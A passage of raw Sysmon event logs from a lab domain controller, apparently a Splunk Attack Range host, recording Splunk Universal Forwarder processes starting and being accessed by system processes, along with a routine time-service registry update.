Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.503{08A6967A-4895-6000-5E05-000000009A01}5956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013608Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.846{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4896-6000-6005-000000009A01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013607Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.846{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013606Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.846{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.846{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.846{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.846{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4896-6000-6005-000000009A01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.846{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4896-6000-6005-000000009A01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.847{08A6967A-4896-6000-6005-000000009A01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.330{08A6967A-4896-6000-5F05-000000009A01}55966448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.174{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4896-6000-5F05-000000009A01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.174{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.174{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.174{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.174{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.174{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4896-6000-5F05-000000009A01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.174{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4896-6000-5F05-000000009A01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:18.175{08A6967A-4896-6000-5F05-000000009A01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:19.002{08A6967A-4896-6000-6005-000000009A01}55845592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:20.096{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4898-6000-6105-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:20.096{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:20.096{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:20.096{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:20.096{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:20.096{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4898-6000-6105-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:20.096{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4898-6000-6105-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:20.097{08A6967A-4898-6000-6105-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:53.800{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:53.800{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:35:56.832{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea7a-0x302003ec) 10341000x800000000000000013623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 